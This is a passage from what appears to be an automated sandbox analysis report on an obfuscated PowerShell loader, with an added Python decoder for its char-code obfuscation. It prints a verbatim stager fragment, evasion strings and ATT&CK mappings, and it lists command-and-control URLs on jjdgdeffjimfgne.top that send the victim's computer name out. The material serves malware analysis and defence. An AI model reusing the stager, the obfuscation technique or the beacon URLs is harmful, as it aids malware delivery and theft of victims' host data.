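The AMSI-captured fragment above hides every method name behind arithmetic: each `[system.String]::new(@(...))` or `([char[]]@(...) -join '')` is an array of integer expressions, one per character code, so a string scanner never sees the word. The following is an added example, not part of the report or of the sample, that evaluates those expressions with a restricted AST walker (no `eval`) and rewrites the fragment with plain literals. `SAMPLE` is a verbatim excerpt of the AMSI line; every helper name is this example's own. Decoding yields `CopyTo`, `Close`, `Close`, `ToArray` and `GetString`, which together with the `[IO.Compression.CompressionMode]::Decompress` visible in the same line is the shape of inflating a blob into a MemoryStream and decoding it as ASCII before the next stage runs.

```python
"""Undo arithmetic char-code obfuscation in a PowerShell fragment.

Added example (not from the report or the sample). SAMPLE is copied
verbatim from the AMSI line above; everything else is this example's own."""
import ast
import operator
import re

SAMPLE = r"""$y3tfeizdwbq6mlr.(([system.String]::new(@((1700-(-7013+8646)),(-9953+10064),(7789-(3303+(19372446/4429))),(2016-(695+(-3541+(-3373+(31604030/(1985+(6715560/3516))))))),(629496/7494),(246-135)))))( $2d64igjrz15vcyt ) $y3tfeizdwbq6mlr.(([system.String]::new(@((125424/(469872/(-7069+7320))),(-9488+9596),(896325/8075),(6653-6538),(684578/6778)))))()$fy9u7kh6ezi8r0b.(([char[]]@((483539/(349+(8483-(6243590/(8119-4253))))),(266760/(16754010/(6164+619))),(-8302+8413),(2419-2304),(9071-8970)) -join ''))()[byte[]] $xbsnruld30okfw7 = $2d64igjrz15vcyt.(([char[]]@((199752/(21742054/9143)),(-9263+(36427364/3886)),(693-628),(4233-(5430-1311)),(-6248+(10308-3946)),(-3436+(-1036+(42135318/(78368556/8498)))),(121484/(6504-(4612+(-8309+(5136+(5746-(-932+2617)))))))) -join ''))() $2o5yj68qiwfzamv=$xbsnruld30okfw7 return $2o5yj68qiwfzamv}[System.Text.Encoding]::ascii.(([system.String]::new(@((4551-(-5540+10020)),(-7193+(36119888/(5049-97))),(513880/(5819-1389)),(-7304+(13675-(8324-2036))),(10264-(11089-941)),(-8711+8825),(9667-9562),(928400/(15558-7118)),(454848/4416)))))("""

_OPS = {ast.Add: operator.add, ast.Sub: operator.sub,
        ast.Mult: operator.mul, ast.Div: operator.truediv}


def eval_arith(expr: str) -> int:
    """Evaluate + - * / and unary minus over integer literals, nothing else,
    so hostile input never reaches eval(). PowerShell's / is exact here."""
    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and type(node.value) is int:
            return node.value
        if isinstance(node, ast.UnaryOp) and isinstance(node.op, (ast.USub, ast.UAdd)):
            value = walk(node.operand)
            return -value if isinstance(node.op, ast.USub) else value
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](walk(node.left), walk(node.right))
        raise ValueError("unsupported syntax: " + ast.dump(node))
    value = walk(ast.parse(expr, mode="eval"))
    if value != int(value):
        raise ValueError(f"{expr!r} is not a whole char code")
    return int(value)


# The two wrappers the sample uses; matched case-insensitively.
_PATTERNS = ("[system.string]::new(@(", "[char[]]@(")
_JOIN = re.compile(r"\s*-join\s*''")


def _close_paren(text: str, open_idx: int) -> int:
    """Index of the ')' matching the '(' at open_idx."""
    depth = 0
    for i in range(open_idx, len(text)):
        if text[i] == "(":
            depth += 1
        elif text[i] == ")":
            depth -= 1
            if depth == 0:
                return i
    raise ValueError("unbalanced parentheses")


def _top_level_items(text: str):
    """Split on commas that are not nested inside parentheses."""
    items, depth, cur = [], 0, []
    for ch in text:
        if ch == "," and depth == 0:
            items.append("".join(cur))
            cur = []
            continue
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
        cur.append(ch)
    items.append("".join(cur))
    return [item.strip() for item in items if item.strip()]


def decode_char_arrays(script: str):
    """Replace each arithmetic char array with a quoted literal.
    Returns (rewritten script, recovered strings in order of appearance)."""
    low, out, found, i = script.lower(), [], [], 0
    while i < len(script):
        pat = next((p for p in _PATTERNS if low.startswith(p, i)), None)
        if pat is None:
            out.append(script[i])
            i += 1
            continue
        open_idx = i + len(pat) - 1                      # the "(" of "@("
        close_idx = _close_paren(script, open_idx)
        items = _top_level_items(script[open_idx + 1:close_idx])
        text = "".join(chr(eval_arith(item)) for item in items)
        j = close_idx + 1
        if pat.startswith("[system"):
            if script[j] != ")":                          # closes ::new(
                raise ValueError("malformed String::new at %d" % i)
            j += 1
        else:
            m = _JOIN.match(script, j)                    # consume " -join ''"
            if m:
                j = m.end()
        out.append("'" + text.replace("'", "''") + "'")
        found.append(text)
        i = j
    return "".join(out), found


if __name__ == "__main__":
    rewritten, names = decode_char_arrays(SAMPLE)
    print(names)
    print(rewritten)
```

After rewriting, the first call reads `$y3tfeizdwbq6mlr.(('CopyTo'))( $2d64igjrz15vcyt )`, which is the point of the exercise: the variable names are still random, but the sequence of .NET calls is now greppable and can be matched against the stream-decompression stager pattern without executing anything.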
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdatauser.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: pdblib.pdbH source: powershell.exe, 00000000.00000002.2222295833.000001D9CBAF7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.2223640221.000001D9CBEBA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2225663167.000001D9CBEE6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V V source: powershell.exe, 00000000.00000002.2181821964.000001D9B1A92000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbogramFi source: powershell.exe, 00000000.00000002.2225663167.000001D9CBEE6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ows\dll\mscorlib.pdb.0? source: powershell.exe, 00000000.00000002.2222295833.000001D9CBAF7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2223640221.000001D9CBE03000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb (x! source: powershell.exe, 00000000.00000002.2225663167.000001D9CBF13000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ows\dll\mscorlib.pdbg source: powershell.exe, 00000000.00000002.2222295833.000001D9CBAF7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb=\\ENGI source: powershell.exe, 00000000.00000002.2225663167.000001D9CBF13000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD347AD2A5 pushad ; iretd 0_2_00007FFD347AD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD348C752B push ebx; iretd 0_2_00007FFD348C756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD348C4FA5 push edi; ret 0_2_00007FFD348C4FA6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD34997041 push edx; retf 0_2_00007FFD349971CB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD34B7C3E4 pushfd ; ret 0_2_00007FFD34B7C3E5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD34B7CBB4 pushad ; retf 0_2_00007FFD34B7CBB5

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5771
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4073
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6104 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B4833000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware
Source: powershell.exe, 00000000.00000002.2223640221.000001D9CBDEE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWC:\Windows\tracing%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B4833000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware`S
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B4833000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: powershell.exe, 00000000.00000002.2223640221.000001D9CBEBA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B4833000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B4833000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: "VMware"
Source: powershell.exe, 00000000.00000002.2225663167.000001D9CBEE6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B4833000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 1:en-US:VMware
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B4833000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: IsVirtualMachine`S
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B4833000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: "IsVirtualMachine"
Source: powershell.exe, 00000000.00000002.2182558071.000001D9B4833000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
MITRE ATT&CK Matrix (techniques listed per tactic column; a leading number is the count badge the report shows next to a technique that was matched):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 2 Windows Management Instrumentation; 1 PowerShell; At; Cron; Launchd; Scheduled Task
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 1 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 121 Virtualization/Sandbox Evasion; 1 Process Injection; 1 Obfuscated Files or Information; 1 DLL Side-Loading; Software Packing; Steganography
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 21 Security Software Discovery; 1 Process Discovery; 121 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 11 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 1 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://jjdgdeffjimfgne.top | 0% | Avira URL Cloud | safe
http://$n57epo4a2v6u0zx/$xme7jrzn1ow6thf.php?id=$env:computername&key=$pagxhc&s=527 | 0% | Avira URL Cloud | safe
https://0.google.com/ | 0% | Avira URL Cloud | safe
http://crl.microsoftF | 0% | Avira URL Cloud | safe
https://0.google | 0% | Avira URL Cloud | safe
http://jjdgdeffjimfgne.top/4s1uhzd0w5htr.php?id=user-PC&key=129546513948&s=527 | 0% | Avira URL Cloud | safe
http://0.google.com/ | 0% | Avira URL Cloud | safe
http://0.google. | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
jjdgdeffjimfgne.top | 45.61.136.138 | true | true | - | unknown
www.google.com | 142.250.184.228 | true | false | - | high
Name | Malicious | Antivirus Detection | Reputation
http://jjdgdeffjimfgne.top/4s1uhzd0w5htr.php?id=user-PC&key=129546513948&s=527 | true | Avira URL Cloud: safe | unknown
http://www.google.com/ | false | - | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://photos.google.com/?tab=wq&pageId=none | powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.google.com/preferences?hl=enX | powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://csp.withgoogle.com/csp/gws/other-hp | powershell.exe, 00000000.00000002.2215308763.000001D9C3D38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3CA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B52B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5388000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5318000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/License | powershell.exe, 00000000.00000002.2215308763.000001D9C3B3C000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://jjdgdeffjimfgne.top | powershell.exe, 00000000.00000002.2182558071.000001D9B52B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B50A9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://news.google.com/?tab=wn | powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://docs.google.com/document/?usp=docs_alc | powershell.exe, 00000000.00000002.2182558071.000001D9B59E4000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schema.org/WebPage | powershell.exe, 00000000.00000002.2182558071.000001D9B61A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B61B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B6194000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5E9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B619D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B6199000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5E7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5E84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B61AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5E88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5E9B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3DC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B52FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3D38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3CA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B5E7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2215308763.000001D9C3AD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2182558071.000001D9B61A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 